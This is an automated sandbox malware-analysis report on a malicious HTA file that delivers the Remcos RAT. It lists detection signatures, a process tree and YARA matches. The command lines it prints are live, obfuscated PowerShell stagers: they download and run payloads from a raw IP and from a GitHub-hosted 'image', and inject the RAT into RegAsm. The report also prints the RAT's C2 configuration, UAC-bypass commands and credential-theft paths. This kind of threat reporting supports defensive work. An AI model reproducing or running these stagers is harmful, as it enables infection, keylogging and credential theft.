Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nicetokissthebestthingsiwantotgetmebackwith.hta

Overview

General Information

Sample name:nicetokissthebestthingsiwantotgetmebackwith.hta
Analysis ID:1536103
MD5:b581033fd1ba02c7724802d3ccda9b5b
SHA1:ad4484b11cfd436200542cc8e4fbaebcb7491bf8
SHA256:008009858f9248a8d5f220f5f4a999438ec8c6218e97560ccde06b35cebd3fe4
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 1848 cmdline: mshta.exe "C:\Users\user\Desktop\nicetokissthebestthingsiwantotgetmebackwith.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 4408 cmdline: "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 4308 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 1532 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE985.tmp" "c:\Users\user\AppData\Local\Temp\1nlzjhnh\CSC4E5E770DE006429A8ABEBD72CF3EF132.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 1396 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 1732 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • RegAsm.exe (PID: 5940 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 6412 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwva" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 5412 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 2000 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 6512 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
              • RegAsm.exe (PID: 4564 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xsnewtbsktv" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["danbana.duckdns.org:9674:1", "danbana.duckdns.org:9764:1", "dantata.duckdns.org:9764:1", "dantata.duckdns.org:9674:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UCDCW8", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6c4b8:$a1: Remcos restarted by watchdog!
          • 0x6ca30:$a3: %02i:%02i:%02i:%03i
          0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
          • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
          • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x6657c:$str_b2: Executing file:
          • 0x675fc:$str_b3: GetDirectListeningPort
          • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x67128:$str_b7: \update.vbs
          • 0x665a4:$str_b9: Downloaded file:
          • 0x66590:$str_b10: Downloading file:
          • 0x66634:$str_b12: Failed to upload file:
          • 0x675c4:$str_b13: StartForward
          • 0x675e4:$str_b14: StopForward
          • 0x67080:$str_b15: fso.DeleteFile "
          • 0x67014:$str_b16: On Error Resume Next
          • 0x670b0:$str_b17: fso.DeleteFolder "
          • 0x66624:$str_b18: Uploaded file:
          • 0x665e4:$str_b19: Unable to delete:
          • 0x67048:$str_b20: while fso.FileExists("
          • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
          Click to see the 27 entries
          SourceRuleDescriptionAuthorStrings
          11.2.RegAsm.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            11.2.RegAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              11.2.RegAsm.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                11.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6aab8:$a1: Remcos restarted by watchdog!
                • 0x6b030:$a3: %02i:%02i:%02i:%03i
                11.2.RegAsm.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x64b7c:$str_b2: Executing file:
                • 0x65bfc:$str_b3: GetDirectListeningPort
                • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x65728:$str_b7: \update.vbs
                • 0x64ba4:$str_b9: Downloaded file:
                • 0x64b90:$str_b10: Downloading file:
                • 0x64c34:$str_b12: Failed to upload file:
                • 0x65bc4:$str_b13: StartForward
                • 0x65be4:$str_b14: StopForward
                • 0x65680:$str_b15: fso.DeleteFile "
                • 0x65614:$str_b16: On Error Resume Next
                • 0x656b0:$str_b17: fso.DeleteFolder "
                • 0x64c24:$str_b18: Uploaded file:
                • 0x64be4:$str_b19: Unable to delete:
                • 0x65648:$str_b20: while fso.FileExists("
                • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                Click to see the 18 entries
                SourceRuleDescriptionAuthorStrings
                amsi32_4408.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security
                  amsi32_1476.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                    amsi32_1476.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygn
                      Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - 